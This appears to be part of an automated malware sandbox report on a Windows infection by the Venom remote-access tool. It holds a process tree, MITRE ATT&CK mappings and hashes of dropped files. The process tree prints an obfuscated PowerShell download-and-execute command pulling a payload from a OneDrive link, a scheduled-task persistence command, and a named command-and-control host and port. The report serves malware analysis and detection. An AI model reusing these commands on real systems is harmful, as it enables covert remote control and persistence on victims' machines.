    "C:\Users\Admin\AppData\Local\Temp\venom.exe"
    3⤵
    - Executes dropped EXE
    PID:3024
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
      4⤵
      PID:1160
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp851E.tmp.bat""
      4⤵
      PID:4828
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1748
    - - C:\Users\Admin\AppData\Roaming\System.exe
        
        "C:\Users\Admin\AppData\Roaming\System.exe"
        5⤵
        
        PID:5596
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1748
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2372
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        5⤵
        
        PID:7620
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        6⤵
        
        PID:7212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        7⤵
        
        PID:2368
- C:\Users\Admin\AppData\Local\Temp\ClientH.exe
  "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3404
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    3⤵
    PID:1072
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
    3⤵
    PID:1132
- C:\Users\Admin\AppData\Local\Temp\venom.exe
  "C:\Users\Admin\AppData\Local\Temp\venom.exe"
  2⤵
  - Executes dropped EXE
  PID:4236
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1268
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:760
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
      4⤵
      PID:6784
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        5⤵
        
        PID:6564
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        6⤵
        
        PID:6764

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:2036

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
PID:5312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:1368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffc626cc40,0x7fffc626cc4c,0x7fffc626cc58
  2⤵
  PID:4616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:8508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1652,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2068 /prefetch:3
  2⤵
  PID:8504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2380 /prefetch:8
  2⤵
  PID:8992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1
  2⤵
  PID:1252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:4464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:1
  2⤵
  PID:9476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3100,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4168 /prefetch:8
  2⤵
  PID:10684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5104,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5124 /prefetch:1
  2⤵
  PID:6660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5368,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5356 /prefetch:8
  2⤵
  PID:3624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5260,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:1
  2⤵
  PID:6492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4824,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:4576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3796,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:7284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4796,i,595473189392233939,7111360779538917913,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5028 /prefetch:8
  2⤵
  PID:7824

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:9484

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
PID:9032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:8312

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004CC
1⤵
PID:1188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\LED\ISO\LED.bat

Filesize
91B

MD5
6abfc25214c714a99b96ecb5b96896ac

SHA1
efb7ae16e25de7bc5d3c2984f7b3737e81027916

SHA256
ce440dae462e4ff608e1c370d891a29e08b78e26a2cdad2dfb09e4f4a48927e6

SHA512
cd64b402e23956e3097e0743002df1245f883b8b78a7155db8a066b573137cfaf10c152e3515902af022755f2a2b2b26b2c29f80943bd733d0b16bcdcd3f5160

Download Submit
C:\ProgramData\LED\ISO\LED.ps1

Filesize
248KB

MD5
2b9b1254123fbce6cab39d5e3a5e9c9c

SHA1
94738cf8dc768668bcfe20b4db5410d91ca3b84b

SHA256
32a23a3520d7bd82e7be89c4c8f7e2c6e66aa761349202730e8a31d4f41a1ad5

SHA512
6f7bc188cd5457171d86f0620eaeacfd75cd3fa53ffea2ce4876d44a8aeeb8c161eb7e55e19eb25a270a8f91d126d6619032a67e15a36a2b54311eebe7f05a70

Download Submit
C:\ProgramData\LED\ISO\LED.vbs

Filesize
879B

MD5
043a4b34e2964e37bd1fb6fbe8d4c5c2

SHA1
5a0dd9ea2b7f2bbafe9a7f205f29de05ccd55960

SHA256
0826e3930f8f93510820aefbe1e2617950910e0d86d8df3701fcb3e9a4420032

SHA512
9a9cf949eb499c20dcfa817613c1ecba84132901c0b56a74e06fe134e39497de6e319f6aa42799e5e0d4f1ae2f737d102f9d84c73b4e4eff864ed01697dcba6e

Download Submit
C:\ProgramData\LED\ISO\Panel.bat

Filesize
89B

MD5
96fc59e30dc3c5c456ec100c27e030e9

SHA1
abb4f73f1ccc4dfc4a7cc8930c42e259c1744faf

SHA256
8eb0194abaf381c26bda39ac125bdf78dcbbdba3d032a52f7cafa371abacd8c0

SHA512
0a122781b5e8503bf92886c50e89fd3b598885c3b53e126d6267fbf3e2de1ab6d5f0f295566445e15e7aba5b84b3d5da07eb7828933451fae1aa53068d20a162

Download Submit
C:\ProgramData\LED\ISO\Panel.ps1

Filesize
3KB

MD5
fdfdc4a9ff59381618fd2537348631df

SHA1
4085f91b0d89b0f25a92946a175b70f72d846af6

SHA256
b162be17f5a052a4f99bc0a64adad887d494f4aa61b112df04fca25143e7020b

SHA512
171b1eb7cbf49e94744d2c4c82cb0f2c5950a68ee61e2eeb62d80be22fc57fa6f0e6f2ed435ae9626a65f910aa66f59a72a7f8dae228e731dba6c1285eddff4e

Download Submit
C:\ProgramData\LED\ISO\Panel.vbs

Filesize
572B

MD5
6768c6ef46d88a3a0551b00a59ca0920

SHA1
369ab3e646835e01e36d3ef0d1c215dbe8645c48

SHA256
8bfe3b92630e2d40df2e2e1b1e700f35edd692e86183a7de303b1d10f91ef542

SHA512
6102b8ca2f88e55b6c98702dffa2d5e1589525a39ee0724fa6a9cef03f5c5ab19d6e6640d2541259f9dd87ac708661fe7e2e4d439f677cc84f16cf1a1e8d46db

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
9a6e6a404025e26e0209b86d6a304f8d

SHA1
948d2a0635d8a5202de0001b4c51b77b510be306

SHA256
33a14be0566a1f987819befa63604429087e156766a9e53f78010279a97666f0

SHA512
3cba8cb0e0025cdcfc3c11253b9a1cdfa07f715dbc8a50b85e5b880ea775e3e50c5bce1ea995abe23b0746203bd110131922781838c8a4420f9da676214f9867

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
f22a353aa8107eb4053348668962b545

SHA1
865e4870979021fcd32e5473f6eef4512a56e7c1

SHA256
4818ec97446e1dccd76e064495901db6f22c5fae741d75b82391333daeaa4288

SHA512
1ce120861829b43b8ec8ee7d958d1858325e2b89f3b0fbfd5c63439ef55fb4a8856f37bacd1aa260b7422035244c4cba312ca36018114e4bebd0388d7c01698f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
e953dd3c0b4bc6ad028e0cfa283dfb27

SHA1
0f08767e1844d79a51b6c015762287cdcf737f77

SHA256
5259d0ede59af1022eb1eb7b1565b59c9c780d6c75d91c7850c6869ad31a79be

SHA512
25edc9530598aaa218dc701787597b00169c71cf1502df1c91846e38f555d7c75f2486defd6e1ea047edaa6cc40523929c542380a761d689247621d5df1551f4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
0b9e4f0430ee5831fca193737da4252e

SHA1
4a224fd0a87bf822ca534b8fa5f11eb914615661

SHA256
a87f0a22c8d164844438d8250f6119195fdaae70e9c5bd3bba21856bdc868d00

SHA512
83a4316ce7093d37e1c8b84a858aacc98743ea9e136dee6002bf4693a72878f6e03e0b4d0da54ffab180e7a293a46adcfbc1b04e30c28431242b9e2df866d516

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
f7f8c113be8ba44a303a2a1573d269f0

SHA1
007906dbb33ce56c843f1de1d89ca2ceb532e6f6

SHA256
fabe8ad5752a84c21f4e499f431105f46407c4a1dbb6558dc233df996c99a5ed

SHA512
1d09c7db557480274e27b299d4f2a119313442d8f147de0f97cc42cd9803a9330545a3529079658c2c654528ff2c31bee31a30e9d6d86c4cedd5982c2ff38bb1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
cf5b9c60ac4b4fcbf36d59c693c6d908

SHA1
1521869a5435ff58f0f58b00ed17fe6e2d5a707f

SHA256
bb8735ec655f1d2eb71183b776e02745758e7243cf34172b0fd73e11ee88f1ee

SHA512
cbb80dd2d38ceeb7aed22922380004a75ff2278ace7e90e15c6865b93272e31b16cdbfd78d17519d7f4ec1c7652377fd44697b99e01bb712c73f4211f810150d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
a2c532004e90b563e0e2848bba185436

SHA1
2d262bef5ca7e4c6068e52c4809c932fa1124881

SHA256
36994b85107aad2a8883c62f7bd7ace2679b8ff54aa89f64d6613d205d8f81a2

SHA512
532331c3261080764c192abdf55f2e66f2791454bf8c1fab5553f3315e4d7785e889e6940e623483a68e217e00aeb0f93d6c7973d178f25e64add0b88f83aca2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
4b47a2447be2ed5f4f1fa53292ea40e4

SHA1
0cb8b44da305a2edf20888d85a382abb916a96bb

SHA256
1d40bf69c9f9ae5871f92782507b0fab833d5d15e20da148a9a4728fc757f63c

SHA512
f1c889dfcf9fea8c65bad7f3ab839edff3def407bfaa6b168be8f38fbc69ebbad2d18ca612d66d5d6942d5a1b710165318f975591b4c2653c0a2ddcfc81f0deb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
858B

MD5
9b089b0075d228c26e359bb13e9ecac1

SHA1
13231d0f76f0dd1327b43dfd4cd86035ae5b2b46

SHA256
df4e9f36dc91d11dfd63a93aeaa2c4cb37a9c3c9cc875fcc967497661dded527

SHA512
42e6f83e6dac09e916b2cd183782408bf3b401496a3b1e3f8e7971ff5fa085f0d440e0702f2ea57da06471e1c02f35d4f8d747e22cbc180561ca7c867066a2ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
b14ddab76417a7cc869d8eb3325a1103

SHA1
5cf3cbdb4c448c8e7d14635676e446f65f03493c

SHA256
ecc7632312f0577762324524beb10440f7c8b5ab3ae80a8e3158c3dff7268898

SHA512
7b7cfa62e3cdd6764f7d372e3dbbf3f4db885b126d8444005378a4067bbaf333f427c2832282e3a41a47b57195fc5213847c4ebaab6792b1efbd092277c28fc4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
4eef02d1ac3a401e91ae3eaaeae66824

SHA1
2be1f279952ac954350fedea1c3bc6d779f6a027

SHA256
87dce6106fc2051e013443b014702ce485d50f29117fcb3dad3fdd697910502d

SHA512
edadbfd3790a4163d891bb3875b4d52a60e649fb10c867fe798aaca348e2774fa247ac522638d1e015899fbbeaef258a03b12f1d113a5b04a6c1bca71062038a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a632a07061fc564f41816483252e463a

SHA1
59d99bee62b836d2367dd9c39a5dbaf464f3e70e

SHA256
65178c36f95656f6aea53c9922957672d1759cf1583edc0cba01940fce93a98d

SHA512
961a3e3c2855897765b02568f8e2f333d36b37c3050f73f1c0ea6ca386545f2b5d80e6d19d4eb1ae654dc2bd5181c9636767bed3786e98e841ec552e71316ad2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
9554745e43c470dbbbb8fd41bbebf718

SHA1
4a82fe36a606cb12f19b487dbc4d9dd05c9d0e94

SHA256
1a20a54926f6d95111abd8f3001ed4880c2b1889fe7ca115fad2050df7a35e29

SHA512
49d3499f3d7edf31a59898b0a9649bef3f775c45b23211f94dd9de8f46309c181973c035dbe4b3d3db5b85fe6fb6a061ea6ff23db37c14135f9d49736dae9975

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
fae8dae986226f6935664580a6aaae76

SHA1
89dc7da4f97e9aa59c6134c3c5a09147e524c277

SHA256
9070488e7b2c281f96c40cdc70c995d4975f8f90b00b6429fe7b7839f869fea0

SHA512
e6075b8304ddd3fc6c2cfacbca8de539216907526042dc8ef9f82956f2c9f9a75e3d6140e175a61a9d8e6a7a4bed3335e4dff6445fdd34a05bf7ea0e8b751340

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
6b8fb175f3c5239b542bdd6599df59d2

SHA1
34491ee7102ce23a89f2e921c7a41762a1c02438

SHA256
444c84e6b9bdf47a10ccb2329bc5d37794be470126e053132c563460e0ed7c1d

SHA512
a8e86d9f3d8db89ebdbce320ab8b747ef331e22114befadf424554231ef6315c75f1fdf39c45aed13c2a3d7740d780551c165a30ae8c7be03e8c3ef4a668af34

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e5104397bb32fbd58b6dc24b2319838e

SHA1
c97ec07b6b448762a071dd2f74651e7fd597170d

SHA256
2d8c9cf2d77c77b022efcf64567c84cc07bb2f5ad578316f65bb983214eae275

SHA512
9da824af963d77b4f383d00e21941f22a4b73b5103195f56bd8da0387ad0cd4d42a3a2fc1f54c0f0a1c6332966f646e98bda925856a057014f554967478b14f8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
73f6bdff1a1e17455ae8b1263821a04e

SHA1
316ceea26b8bcaaab025ca3643b92d55218f2621

SHA256
4726071775d1e8ed999fd5fc5c0a40927bdb9f11784fa8d13ae685b2379b2a37

SHA512
ddba2527f7104da922e472a9614b7c20906a0755cedc4006b86eb4d00fd6d4f1178884f879b26bf1c7f66803dbb18da360aa1aaf4ada369df25c12153b75e384

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
183B

MD5
7fd6c0b813957858779ab600f86a492e

SHA1
cd94338386e7bf52a87113532fc30f5fc654fbbb

SHA256
47590f1a9ff49ffdbe198e5e2a3ccdc6b7142bea6412122a39bf610126652d79

SHA512
85d9a0be937b6a530026a05b882272670c6b5f5abfc8111a5292a4db5738a661941596c28b6a194b5477dbb38367c2a0571ff444bf7f4ac7d1e0b53c5563b156

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
9b72cde1c35cb70b0eb475d3b0d180ad

SHA1
bde8349fad791eff22bca3a8cf64c3cdcac7c508

SHA256
bb7657af0a5368459148a9c6f8185bab9edbdd424c6149d5d8604d41eae4cee8

SHA512
7eeb9dd90955072d07544577cbb142a2698f2382a67a80b3fe6f904b2eacd884e652b27e5d81a0081e3460ee55ff60089794c09f27af284d464dc38846b0eeba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe59986e.TMP

Filesize
119B

MD5
75cc382b32a45ee77ca7e8f72bb8b8b8

SHA1
ebcdadde85b421b3e92cfc25f5067ffd61a5031f

SHA256
3a4b2ab5932a3dc513c0cfe6ce2b1e99bed0490c7c9e2b04fcf75702c255ff76

SHA512
05fcce8af3ad166a62f540b2544ea838207b3a5a977ef0d33fab5d1a876edfcdde6b221c44165322b51c60bb744e279e97733ed1301ada1b5918f42a28767114

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
228KB

MD5
8a0295b3b18687d5bae7fb48012a3fc7

SHA1
59b0599fa4dd87b852b394be88d9ef4c5a3cd107

SHA256
807f33dbcd12089cc814bf06c7bf5520a8cf6fd692f34204a6562c38c491a082

SHA512
bc1b787f90a14bc120fabdc543fbd4f81c12c2229088e4e422dc29dcdd5d6a960a0ac6e4ec365907334ea799dabec5d2e12b2f18cacf1d56ec114c3bc478cfe3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
234KB

MD5
a342bbae1cf2d1f38cce6e6767fcdf14

SHA1
207b24c1a3b34ddea26f1f1b9a43e8716b079ce2

SHA256
589f7d6c197f45b85c884072317d100c35fee336d34be7b4282ebe1146452f75

SHA512
8e47c534734a8bfc69e1f586374d5f1d2e1a15505df9694ea0b3d7f0df105f3c9c06583d8740e7d4e4da521e15141359eee2fe288ca75d2861b432ca19c15376

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
228KB

MD5
6420844a4a751e80e093a8f9ee64bbf3

SHA1
db2552557a57ec88d05f527f7c86c8a13c919f2f

SHA256
198c4022ca63af1805afa7ba05a0eb07f44afdb7d1f716ce61d2fecb6d9d30b3

SHA512
29e31b9d2e76551aaa06ce5f77e26233c1a28d21db5c731b48c7b76cc53d880c7544640f8aae636674c2d21d6ab03fb8caf3b2ee055ed66c6c533c96e129e32b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
228KB

MD5
e1fe8721b2a340e109992120937cad8d

SHA1
007c11746ebb9350c26976bb043032dc59c1658a

SHA256
c273a5f3a366f85d052bb9b5815980c7ae1e19ef95a7a926e203b34da0d224a6

SHA512
78c0d84f8ef621c0e7e0b40890f84d4ad6103c2a75422fb6eee0d34945df2b063b95b849aaabf5beae1017127e2afd80254a270f209c00ed2e9d4f065afe7cdd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\venom.exe.log

Filesize
425B

MD5
de75c43a265d0848584ae05945570edf

SHA1
69f95177914f8d8b2f278a91f585a0024b8dffd3

SHA256
d9bdf6a2bfdd9b2b5c8593de17ade3d8d317dad331aa6ca0da7483dd06db1140

SHA512
365f29c693dd7aa2ade092d765a96f20bf1f7fa93bca7f3b25aeddf5700817b9fd388e8f7d9f1b781c8a876739b06ad16d61e7ed08a1c85ac4be4686a38c63bc

Download Submit
